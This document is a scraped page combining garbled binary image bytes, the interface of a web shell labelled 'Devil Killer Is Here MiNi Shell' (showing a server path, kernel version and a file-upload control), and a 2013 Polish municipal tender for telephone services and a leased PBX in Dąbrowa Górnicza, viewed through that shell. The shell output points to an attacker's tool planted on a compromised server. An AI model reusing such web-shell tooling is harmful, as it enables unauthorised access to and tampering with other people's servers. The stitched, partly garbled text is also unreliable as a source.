JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130710/139151-N-2013.html

<p class="kh_header"><b>Dąbrowa Górnicza: Świadczenie usług telefonicznych wraz z dzierżawą cyfrowej centrali telefonicznej dla potrzeb Urzędu Miejskiego w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 139151 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telefonicznych wraz z dzierżawą cyfrowej centrali telefonicznej dla potrzeb Urzędu Miejskiego w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia poniżej kwoty dla dostaw i usług określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r., Nr 113, poz. 759 z późn. zm.) na zadanie pn.: Świadczenie usług telefonicznych wraz z dzierżawą cyfrowej centrali telefonicznej dla potrzeb Urzędu Miejskiego w Dąbrowie Górniczej

1. Przedmiotem zamówienia są usługi polegające na dostarczeniu połączeń przyłączem kablowym obejmujące:
a. Usługę polegającą na realizacji połączeń telefonicznych przychodzących i wychodzących za pomocą dwóch łączy PRA (2x30B+D) wraz z przydzieleniem 400 NN DDI, ponadto łączami ISDN BRA i łączami analogowymi PSTN, zgodnie z poniższą tabelą:
Lp.	Numer telefonu	Rodzaj linii	miasto	ulica
1	(32) 2624164	 PSTN   Dąbrowa Górnicza ul. Graniczna 21
2	(32) 2613127		
3	(32) 2617540		
4	(32) 2622024			
5	(32) 2623033			
6	(32) 2623486			
7	(32) 2624455			
8	(32) 2625032			
9	(32) 2626143			
10	(32) 2626982			
11	(32) 2627193			
12	(32) 2627598			
13	(32) 2629702		          Dąbrowa Górnicza	ul. Graniczna 21
14	(32) 2624410	ISDN 2B+D	  Dąbrowa Górnicza	ul. Graniczna 21
15	(32) 2959600	ISDN 30B+D		
16	(32) 2956700	ISDN 30B+D		
Zamawiający zastrzega sobie możliwość zmiany lokalizacji linii zgodnie z obowiązującym cennikiem Wykonawcy.
b. Usługę bezpłatnego połączenia do służb powołanych ustawowo do niesienia pomocy posiadających numery skrócone m.in.: 112, 991, 992, 996, 997, 998, 999.
c. Usługę polegającą na dostarczeniu, zainstalowaniu, uruchomieniu wraz z oprogramowaniem, wydzierżawieniu, a także serwisie na czas trwania umowy, w obiekcie cyfrowej centrali telefonicznej (nie starszej niż 4 lata) zwaną dalej dzierżawą centrali oraz wyposażenia dodatkowego w postaci systemu zasilania awaryjnego centrali, stanowiska awizo oraz 16 szt. aparatów systemowych. 
2. Zakup 25 szt. aparatów analogowych.
3. Specyfikacja określająca minimalne parametry centrali, wyposażenia dodatkowego oraz aparatów telefonicznych zawarta jest w ppkt 1.1.
4. W ramach przedmiotu zamówienia Wykonawca zapewni uruchomienie, pełną konfigurację centrali, telefonów oraz aparatów wewnętrznych będących na wyposażeniu Zamawiającego, wraz z przełączeniem na Przełącznicy Głównej wszystkich obwodów i linii telefonicznych, obecnie pracujących, w sposób nie zakłócający pracy Urzędu Miejskiego. Prace przełączeniowe powinny odbyć się poza godzinami pracy Urzędu Miejskiego, a wszystkie koszty z tym związane Wykonawca uwzględni w cenie oferty. Wszystkie czynności dotyczące uruchomienia oraz konfiguracji Wykonawca wykona zgodnie z zaleceniami Zamawiającego oraz zgodnie z obowiązującymi przepisami BHP i p.poż, ochrony środowiska oraz wytycznymi dotyczącymi wykonywania i odbioru instalacji elektrycznych i teletechnicznych.
5. Koszty ubezpieczenia sprzętu oddanego w dzierżawę przez cały okres trwania umowy oraz ubezpieczenia  przedmiotu umowy na czas transportu i dostawy, rozładunku, wniesienia i zainstalowania ponosi Wykonawca. Uruchomienie przedmiotu umowy zostanie potwierdzone protokołem odbioru prac, który zostanie podpisany przez obie strony. Protokół będzie stanowił podstawę do rozpoczęcia naliczania opłat przez Wykonawcę.
6.	Wykonawca zapewni w siedzibie Zamawiającego przeszkolenie wskazanych pracowników w zakresie obsługi i administrowania zaoferowanego przedmiotu dzierżawy wliczając koszt szkoleń w cenę oferty.
7.Zamawiający zapewni odpowiednie pomieszczenia na potrzeby instalacji przedmiotu umowy wraz z zasilaniem elektrycznym. Zamawiający pokryje koszty zużycia energii elektrycznej funkcjonowania przedmiotu umowy oraz zobowiązuje się udostępnić własną infrastrukturę teleinformatyczną niezbędną do realizacji przedmiotu zamówienia.
8.	Wykonawca udzieli gwarancji na dostarczoną centralę telefoniczną i aparaty telefoniczne na czas trwania umowy.
9. Wykonawca zapewni przeniesienie do własnej sieci dotychczasowych numerów przydzielonych i wykorzystywanych przez Zamawiającego (bez powodowania przerw w pracy), zgodnie z art. 71 ustawy prawo telekomunikacyjne z dnia 16 lipca 2004 r. (Dz. U. z 2004 r. Nr 171 poz. 1800 ze zm.) oraz Rozporządzenia Ministra Infrastruktury z dnia 16 grudnia 2010 r. w sprawie warunków korzystania z uprawnień w publicznych sieciach telefonicznych (Dz. U. z 2010 Nr 249 poz. 1670). 
10.	Centrala telefoniczna ma być wyposażona w usługę DISA na liniach miejskich z możliwością samodzielnej bezpłatnej zmiany treści zapowiedzi lub bezpłatną zmianą treści, jeżeli wymaga to udziału serwisu.        
a) Treść zapowiedzi będzie miała następujące brzmienie:
Witamy w Urzędzie Miejskim w Dąbrowie Górniczej. Prosimy wybrać numer wewnętrzny lub poczekać na połączenie z operatorem. Dziękujemy.
b)	Usługa DISA zostanie skonfigurowana w następujący sposób:
w przypadku połączenia interesanta przez centralę telefoniczną z numerem wewnętrznym Zleceniodawcy, który jest wolny, ale nikt nie odbiera - po sześciu sygnałach rozmowa zostanie przekierowana do stanowiska awizo,
w przypadku połączenia interesanta ze stanowiskiem awizo Zleceniodawcy w chwili, kiedy telefonistka ją obsługująca realizuje inne połączenie, interesant ma usłyszeć sygnał zajętości.
11. Wykonawca uwzględni wszystkie koszty  w cenie oferty. 
12. Zamawiający wykorzystuje średnio miesięcznie (struktura połączeń telefonicznych rozkłada się w sposób następujący)
Połączenia lokalne,strefowe  4.000 minut
Połączenia międzystrefowe 28.000 minut
Połączenia międzynarodowe do krajów Unii Europejskiej 90 minut 
Połączenia do sieci komórkowych 10.000 minut, w tym połączenia do operatora sieci komórkowych PLAY  600 minut
Połączenia na infolinie 0 80.. 250 min
13. Połączenia mają być realizowane w naliczaniu sekundowym, płaskim planie taryfowym tj. bez określenia taryfikacji ze względu na porę dnia oraz dni tygodnia, bez dodatkowych opłat za inicjacje połączeń.
14.Wykonawca zapewni automatyczną preselekcję.
15.Wykonawca zapewni realizację usługi polegającej na blokowaniu połączeń wychodzących danego typu na dowolnym numerze w terminie jednego dnia roboczego od dnia przekazania informacji przez Zamawiającego (faksem lub elektronicznie).
16.Wykonawca dostarczać będzie w cyklach miesięcznych faktury wraz z rozliczeniem poszczególnych numerów w formie papierowej (tzw. Specyfikacja usługi zawierająca informację o wysokości abonamentu, łącznym czasie połączeń wychodzących z podziałem na połączenia lokalne (strefowe), międzystrefowe, do sieci komórkowych i międzynarodowe). Ponadto zobowiązany będzie do dostarczania kopii faktur oraz bilingów w wersji elektronicznej w formacie umożliwiającym export danych do arkusza kalkulacyjnego Excel:
na dysku CD lub innym nośniku danych,
na stronie internetowej Wykonawcy.
17.Wykonawca zobowiązany będzie do ubezpieczenia sprzętu oddanego w dzierżawę Zamawiającemu na swój koszt i ryzyko.
18. Zamawiający przewiduje możliwość podłączenia i uruchomienia usługi VoIP dla połączeń telefonicznych wewnętrznych oraz zewnętrznych.

1.1. Minimalne wymagania dotyczące dzierżawionej centrali telefonicznej wraz z wyposażeniem:
1.1.2. Centrala telefoniczna
1.Przeznaczenie systemu: cyfrowa centrala biurowa z możliwością rozbudowy do 450 abonentów analogowych
2.Rozmiar obudowy: szafa teleinformatyczna nie większa niż: szerokość 600 mm, głębokość 800 mm, wysokość 2 000 mm. 
3.Minimalna liczba linii miejskich obsługiwanych przez centralę:
a. linie analogowe miejskie POTS               	16 portów
b. linie miejskie cyfrowe ISDN BRA 2B+D       	4 porty
c. linie miejskiej cyfrowe ISDN PRA 30B+D     	2 porty
4.Minimalna liczba linii wewnętrznych
a. linie analogowe                            		416 portów     		
b. linie cyfrowe systemowe                   16 portów
c. stanowisko awizo                         		1 port
5.Obsługa numeracji miejskiej jako wewnętrznej (DDI MSN)
6.System musi posiadać wewnętrzną książkę telefoniczną
7.Rejestracja i taryfikacja połączeń wychodzących, przychodzących i wewnętrznych
8.Prezentacja numeru dzwoniącego (CLIP) z linii miejskich ISDN, analogowych, GSM na liniach wewnętrznych cyfrowych i analogowych
9.Zintegrowany moduł poczty głosowej oferujący minimum 200 skrzynek poczty, 100 godzin pamięci, funkcję nagrywania, indywidualne i centralne zapowiedzi, minimum 13 kanałów dostępu .
10.Funkcja LCR - automatyczny wybór najtańszej drogi połączenia
11.Możliwość zarządzania zdalnego centralą z sieci LAN 
12.Centrala musi umożliwiać automatyczne rozpoznawanie sygnału faksu na wszystkich liniach wewnętrznych analogowych
13.Wymagana możliwość definiowania klas uprawnień i restrykcji dla abonentów
14.Wymagana możliwość tworzenia zestawów sekretarsko-dyrektorskich na liniach analogowych
15.Wymagana możliwość rozbudowy systemu PABX o telefony IP
16.Wymagana możliwość rozbudowy systemu PABX o telefony bezprzewodowe w standardzie DECT GAP
17.Wymagana możliwość rozbudowy systemu PABX o aplikacje CTI
18.Wymagana rejestracja rozmów - min. 200 godzin
19.Przełączenie łączności (linie miejskie, wewnętrzne) z obecnie pracującej centrali abonenckiej na nową zainstalowaną centralę w czasie maksymalnie krótkim i w uzgodnionym terminie.
1.1.3. Wyposażenie dodatkowe
1.Zasilanie awaryjne centrali zapewniające podtrzymanie pracy centrali przy pełnym obciążeniu przez minimum 2 godziny.
2.Stanowisko AWIZO wyposażone w zestaw słuchawkowy nagłowny i komputer do zarządzania połączeniami wraz z koniecznym oprogramowaniem
3.Cyfrowe aparaty systemowe 16 szt., o parametrach:
a.wyświetlacz graficzny z podświetleniem
b. wbudowany mikrofon i głośnik regulowanej głośności umożliwiający prowadzenie rozmowy w trybie głośnomówiącym (pełen dupleks), 
c.gniazdo do podłączenia słuchawki nagłownej, 
d.osobista książka telefoniczna, 
e.minimum 20 przycisków programowalnych do szybkiego wybierania numerów
f. obsługa w języku polskim
4.Aparaty analogowe bezprzewodowe 15 szt., o parametrach:      
Podświetlany wyświetlacz,
System głośnomówiący,
Książka telefoniczna na 50 wpisów,
Szukanie wpisów po pierwszym znaku,
Lista ponownego wybierania 10 numerów,
Lista połączeń na 50 wpisów (wszystkie z zaznaczonymi połączeniami nieodebranymi),
Identyfikacja abonenta wywołującego,
Menu w j. polskim,
Data i godzina,
Wyłączenie słuchawki,
Zawieszenie połączenia,
Chwilowe wybieranie tonowe,
Flash 
5.Aparaty analogowe przewodowe typu biurowego - 10 szt., o parametrach:      
Opisy na obudowie w języku polskim, 
Jednoprzyciskowe wybieranie,
Skrócone wybieranie 10 numerów telefonicznych, 
Lampka sygnalizacji dzwonka, 
Ponowne jednoprzyciskowe wybieranie ostatniego numeru, 
Przycisk Flash, 
Przycisk do wyłączenia mikrofonu, 
3-stopniowa regulacja głośności dzwonka (głośno,cicho,wyłączony),
Regulacja głośności w słuchawce (normalny,średni,wysoki),
Możliwość montażu na ścianie    

1.1.4. Warunki serwisu urządzeń:
Wymaga się zapewnienia serwisu na warunkach opisanych w par. 4 projektu umowy głównej na czas trwania umowy 24 miesięcy od dnia podpisania protokołu odbioru przedmiotu dzierżawy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do wysokości 12% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.20.00.00-8, 32.55.23.10-3, 32.54.60.00-2, 32.55.13.00-3, 64.21.00.00-1, 64.21.11.00-9, 64.21.42.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje co najmniej 3 usługi dzierżawy systemu telekomunikacyjnego składającego się z centrali telefonicznej, aparatów telefonicznych, obsługującego minimum 400 abonentów, w tym co najmniej jedną usługę dzierżawy systemu telekomunikacyjnego cyfrowego (minimum 400 abonentów korzystających z aparatów analogowych lub cyfrowych).
Weryfikacja spełniania warunku zostanie przeprowadzona na podstawie Wykazu wykonanych usług wraz z dokumentami potwierdzającymi ich należyte wykonane wg formuły: spełnia- nie spełnia.

Uwagi :
1. Jeżeli zakres wskazanych i udokumentowanych, przez Wykonawcę w wykazie, usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie wskazać zakres i wartość usług odpowiadających zakresowi wymaganemu przez Zamawiającego.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym opublikowane zostało ogłoszenie 
o niniejszym zamówieniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy przedłożyć:
1. Formularz ofertowy - załącznik nr 1A do SIWZ (wskazana data podpisania);
2. Formularz cenowy - załącznik nr 1B do SIWZ (wskazana data podpisania);
3. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
4.  w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b Ustawy.
Uwagi:
1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 9.2.2. SIWZ składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2. Dokument, o którym mowa w pkt 1 Uwag, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1 Uwag, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
4. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
5. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
7. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
8. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
9. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
10. Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną wynikającą z art. 297 Kodeksu Karnego. W razie stwierdzenia, że złożone przez Wykonawcę informacje są nieprawdziwe Zamawiający zgodnie z dyspozycją art. 304 k.p.k. - zawiadomi o tym fakcie właściwy organ ścigania.
